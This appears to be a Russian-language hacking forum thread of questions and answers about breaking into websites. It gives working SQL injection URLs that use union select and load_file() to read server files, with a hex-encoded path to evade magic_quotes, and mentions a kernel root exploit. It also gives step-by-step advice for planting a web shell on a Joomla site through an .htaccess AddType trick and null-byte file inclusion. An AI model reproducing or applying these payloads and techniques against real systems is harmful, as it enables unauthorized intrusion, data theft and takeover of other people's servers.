http://test.ru/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+union+select+load_file('/var/www/test/htdocs/browse_classifieds.php'),2,3%20/* Подправьте пожалуйста запрос для скачки /var/www/test/htdocs/browse_classifieds.php данного файла
вы имеете в виду magic_quotes_gpc=on тогда http://test.ru/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+union+select+load_file(0x2f7661722f7777772f746573742f6874646f63732f62726f7773655f636c6173736966696564732e706870),2,3%20/*
есть сервер Linux 2.6.18-028stab057.4 #1 SMP Fri Aug 1 10:47:59 MSD 2008 i686 GNU/Linux при запуске эксплойта http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz пишется ошибка: ядро пропатчено?!
magic_quotes экранирует спецсимволы (',",null,/), в данном случае одиночные кавычки, чтобы читать файлы конструкцией load_file необходимо их наличие, для обхода экранизации используеться Sql Hex
http://ru.php.net/get_magic_quotes_gpc /var/www/test/htdocs/browse_classifieds.php => 0x2f7661722f7777772f746573742f6874646f63732f62726f7773655f636c6173736966696564732e706870 => union+select+load_file(0x2f7661722f7777772f746573742f6874646f63732f62726f7773655f636c6173736966696564732e706870) при соответствующих правах
Добрый вечер всем.cms джумла, папка на запись только images, joomla_xplorer не установить как и другой модуль, шаблоны не правятся, в пaпке с картинками залитый шелл выдается иcxодным кодом.... как залить шелл?
- пробовать расширения .phtml, .php3 и т.д. - мешает .htaccess, определить какой, если в images удалить, если в корне, в images залить свой, в нем разрешить выполнение с нужным расширеним, по типу AddType application/x-httpd-php .php .phtml .jpg
Языки тоже не правятся? Хотя скорее всего да, иначе ты бы не написал бы пост... В джамуле некоторые пути до пхп файлов (которые инклудятся двигом), а точнее до дир лежат в бд. И возможно тебе удастся проинклудить шелл, который сам по себе не выполняется. Запросы к бд выполняй через восстановление БД (запихиваешь нужный запрос в файл, к примеру 1.sql). В путях, скорее всего, имени пхп файла не будет и скорее всего везде будет инклудиться index.php, но тут должен помочь %00 (mq = on не помешает, т.к. запрос будет лежать в загружаемом файле). Посмотри вот это: https://forum.antichat.ru/showpost.php?p=697864&postcount=10 (там нечто похожее описывалось) + скачай двиг и потестируй все на локалке, иначе все убьешь в мгновение, да и после успешного выполнения двиг нормально работать не будет - нужно будет быстро перезалить шелл и все вернуть на место.
как правильно составить запрос? SELECT * FROM mobiticket.structure_page WHERE tag = '53' AND status = 'active' пробую так page.php?page=53'+union+select+1,2,3,4,5,6,7,8,9,'10 пишет